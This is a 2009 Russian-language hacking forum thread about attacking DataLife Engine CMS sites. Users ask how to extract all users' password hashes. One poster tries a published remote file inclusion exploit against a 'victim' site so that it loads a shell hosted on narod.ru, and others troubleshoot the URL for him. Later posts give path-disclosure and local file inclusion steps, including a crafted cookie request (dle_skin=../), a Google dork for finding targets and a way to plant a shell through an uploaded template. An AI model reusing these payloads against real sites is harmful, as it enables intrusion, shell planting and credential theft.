HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.10.2009, 11:40
denniselite
Новичок
Регистрация: 07.10.2009
Сообщений: 8
Провел на форуме:
150434

Репутация: 7
По умолчанию

Люди подскажите как можно вытащить хеши паролей всех пользователей без доступа к бд?
 
Ответить с цитированием

  #2  
Старый 12.10.2009, 09:16
SpYeR
Новичок
Регистрация: 11.11.2007
Сообщений: 17
Провел на форуме:
64705

Репутация: 6
По умолчанию

Цитата:
Сообщение от denniselite  
Люди подскажите как можно вытащить хеши паролей всех пользователей без доступа к бд?
Если есть доступ в админку, то сделать бэкап базы, скачать его, и вытащить оттуда.
 
Ответить с цитированием

  #3  
Старый 16.10.2009, 19:51
hackmon
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547

Репутация: 93
По умолчанию

у мня проблема вот линк http://www.milw0rm.com/exploits/9572
там эксплоит www.site/path /engine/api/api.class.php?dle_config_api=[shell.txt?]

вместо сайт я вставляю сайт жертвы (и знаю что там установлена такая же версия)


эта строчко остается неизменная /engine/api/api.class.php?dle_config_api=

и шелл Я загрузил на site narod.ru тоесть после config_api= я ввожу линк на свой сайт с шеллом

пс убирал расширение ничего

кто потскажет
 
Ответить с цитированием

  #4  
Старый 16.10.2009, 21:17
(Dm)
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
Провел на форуме:
2375131

Репутация: 1695
По умолчанию

Цитата:
Сообщение от hackmon  
у мня проблема вот линк http://www.milw0rm.com/exploits/9572
там эксплоит www.site/path /engine/api/api.class.php?dle_config_api=[shell.txt?]

вместо сайт я вставляю сайт жертвы (и знаю что там установлена такая же версия)


эта строчко остается неизменная /engine/api/api.class.php?dle_config_api=

и шелл Я загрузил на site narod.ru тоесть после config_api= я ввожу линк на свой сайт с шеллом

пс убирал расширение ничего

кто потскажет
Может register_globals = Off
 
Ответить с цитированием

  #5  
Старый 16.10.2009, 21:41
hackmon
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547

Репутация: 93
По умолчанию

Цитата:
Сообщение от (Dm)  
Может register_globals = Off
я на разных сайтах смотрел
wildshaman предположил что Эта бага есть только у версий,с качанных с сайта http://dlecms.com

как по другому моно замутить
 
Ответить с цитированием

  #6  
Старый 17.10.2009, 17:50
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию

Раскрытие путей + LFI
DataLife Engine <= 8.2

Тип: Раскрытие путей
Автор: mailbrush
Версия: DataLife Engine <= 8.2
Описание: Уязвимость заключается в отсутствии фильтрации входного параметра "dle_skin" в файле init.php и позволяет удалённому пользователю добиться вывода ошибки функции, соответственно увидев пути к корню сайта.
Уязвимый код:
/engine/init.php
PHP код:
...
 } elseif (isset(
$_COOKIE['dle_skin']) AND $_COOKIE['dle_skin'] != '') {

    if (@
is_dir(ROOT_DIR.'/templates/'.$_COOKIE['dle_skin']))
        {
            
$config['skin'] = $_COOKIE['dle_skin'];
        }
 }
...
$tpl->dir ROOT_DIR.'/templates/'.$config['skin'];
...
include_once 
$tpl->dir.'/login.tpl'
Эксплуатация:
  1. Заходим на сайт DLE. Открываем браузером менеджер куки. Изменяем / добавляем параметр, название которого ставим
    Код:
    dle_skin
    и значение
    Код:
    ../
  2. Отправляем запрос на сайт:
    Код:
    GET / HTTP/1.1
    Host: dle-news.ru
    Cookie: dle_skin=../
    Cookie2: $Version=1
    Connection: Close
  3. Самый простой вариант - используем мой скрипт:
    Код:
    http://mailbrush.eu/tools/dle.php
После этого на сайте видим ошибку:
Цитата:
Warning: include_once([PATH]): failed to open stream: No such file or directory in [PATH] on line 314

Warning: include_once(): Failed opening '[PATH]' for inclusion (include_path='.;C:\php5\pear') in [PATH] on line 314
Невозможно загрузить шаблон: shortstory.tpl
[PATH] - это и есть раскрытие путей.

Соображающие люди поймут как сделать из этого LFI.

Дорк:
Код:
Powered by DataLife Engine

Последний раз редактировалось mailbrush; 08.02.2010 в 18:31..
 
Ответить с цитированием

  #7  
Старый 16.10.2009, 20:08
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


По умолчанию

http://site-na-dle.ru/engine/api/api.class.php?dle_config_api=http://site.narod.ru/.txt?
так делал? с вопросом в конце.
 
Ответить с цитированием

  #8  
Старый 16.10.2009, 20:18
hackmon
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547

Репутация: 93
По умолчанию

Цитата:
Сообщение от wildshaman  
http://site-na-dle.ru/engine/api/api.class.php?dle_config_api=http://site.narod.ru/.txt?
так делал? с вопросом в конце.
все равно
 
Ответить с цитированием

  #9  
Старый 18.10.2009, 16:20
SpYeR
Новичок
Регистрация: 11.11.2007
Сообщений: 17
Провел на форуме:
64705

Репутация: 6
По умолчанию

mailbrush
Круто.
Ухты! Можно даже залить шелл если в uploads/files залить свой login.tpl
указывать dle_skin=../uploads/files/
 
Ответить с цитированием

  #10  
Старый 18.10.2009, 23:31
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Раскрытие путей
DataLife Engine 8.2 Без всяких куков

1)файл preview.php
PHP код:
require_once ROOT_DIR.'/engine/classes/templates.class.php'
самое прикрльное что ROOT_DIR читает как папку, хотя многие в асе написали что
константа *в не понятках*

вызываем этот файл:
http://dle/engine/inc/preview.php
получаем
Цитата:
Warning: require_once(ROOT_DIR/engine/classes/templates.class.php) [function.require-once]: failed to open stream: No such file or directory in C:\AppServ\www\upload33\engine\inc\preview.php on line 2
на офф сайте даже канает)

+ 2)еще ругается с файла Init.php
PHP код:
require_once (ENGINE_DIR '/inc/include/functions.inc.php');
extract$_REQUESTEXTR_SKIP );
require_once (
ENGINE_DIR '/data/config.php'); 
http://dle/engine/inc/include/init.php

Цитата:
Warning: require_once(ENGINE_DIR/inc/include/functions.inc.php) [function.require-once]: failed to open stream: No such file or directory in /home/public_html/engine/inc/include/init.php on line 18
+3) нужны куки

engine/ajax/antivirus.php
PHP код:
if (isset( $_COOKIE['selected_language'] )) { 

    
$_COOKIE['selected_language'] = totranslit$_COOKIE['selected_language'], falsefalse );

    if (@
is_dir ROOT_DIR '/language/' $_COOKIE['selected_language'] )) {
        
$selected_language $_COOKIE['selected_language'];
    }

}

require_once 
ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng'
все тоже самое что и у mailbrush'a. только в куках имя selected_language и значение ../ уже выдаст ошибку

+4) самое бональное раскрытие

engine/modules/imagepreview.php
PHP код:
$_GET['image'] = htmlspecialchars ($_GET['image'], ENT_QUOTES);
$_GET['image'] = str_replace"document.cookie"""$_GET['image'] );
$_GET['image'] = str_replace"javascript"""$_GET['image'] ); 
http://dle/engine/modules/imagepreview.php?image[]=
PS и не нужны куки здесь)
Зыы ну почти не нужны

Последний раз редактировалось HAXTA4OK; 19.10.2009 в 08:03..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Уязвимости CMS / форумов 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.